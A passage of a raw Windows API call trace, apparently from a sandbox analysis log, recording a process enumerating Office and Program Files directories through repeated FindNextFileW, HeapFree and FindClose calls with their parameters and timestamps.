lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0186.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.537] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 0 [0186.537] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0186.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.539] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 1 [0186.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.543] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 0 [0186.543] FindClose (in: hFindFile=0x43a28d8 | out: hFindFile=0x43a28d8) returned 1 [0186.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.543] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Common Programs", cAlternateFileName="COMMON~1")) returned 1 [0186.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.543] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x245b0966, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x245b0966, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245d6b52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0186.544] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.544] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x868ac6fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x868ac6fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0186.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.554] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8913323b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8913323b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="private", cAlternateFileName="")) returned 0 [0186.554] FindClose (in: hFindFile=0x43a29d8 | out: hFindFile=0x43a29d8) returned 1 [0186.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0186.554] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xaf31749c, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xaf31749c, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX64", cAlternateFileName="PROGRA~3")) returned 1 [0186.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0186.555] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0186.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.556] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f7aa31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f7aa31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1702b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0186.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.556] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0186.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.558] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf086f11e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf086f11e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf086f11e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0186.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.560] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0186.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.560] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14c6cb9, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x14c6cb9, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0186.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.561] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2e1f46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0186.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.563] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12910b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26737b32, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26737b32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0186.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.566] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0186.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.566] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bb01a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bb01a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0186.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.641] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceb38292, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceb38292, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe172e9be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x22cad0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0186.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.644] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x24bcc96d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24bcc96d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DataModel", cAlternateFileName="DATAMO~1")) returned 1 [0186.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.646] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39de918 | out: lpFindFileData=0x39de918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17e0c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AnalysisServices.Common.dll", cAlternateFileName="MI1312~1.DLL")) returned 1 [0186.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44550c8 | out: hHeap=0x680000) returned 1 [0186.647] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39de69c | out: lpFindFileData=0x39de69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4befc00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0186.647] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0186.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.647] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39de918 | out: lpFindFileData=0x39de918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x447d6b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x447d6b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a38de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c190, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Spatial.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0186.648] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.648] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2803429, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2803429, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0186.648] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.648] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x26a58c7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77e88, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0186.649] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.649] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39de918 | out: lpFindFileData=0x39de918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef915def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8f6526, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 0 [0186.650] FindClose (in: hFindFile=0x43a2e98 | out: hFindFile=0x43a2e98) returned 1 [0186.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.650] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0fbc434, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0fbc434, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf10a1263, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0186.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.652] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8d02b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8d02b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0186.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.652] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc576616a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0186.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.653] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc62081b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1bac0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0186.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44450c0 | out: hHeap=0x680000) returned 1 [0186.654] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39de918 | out: lpFindFileData=0x39de918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0186.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.654] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cec0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0186.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.656] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0ed7602, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0ed7602, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0ed7602, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0186.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.656] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5f76153, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEXTCONV", cAlternateFileName="")) returned 1 [0186.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0186.656] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES16", cAlternateFileName="")) returned 1 [0186.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.657] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0186.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.657] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="AXIS", cAlternateFileName="")) returned 1 [0186.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0186.658] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a96da3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a96da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, 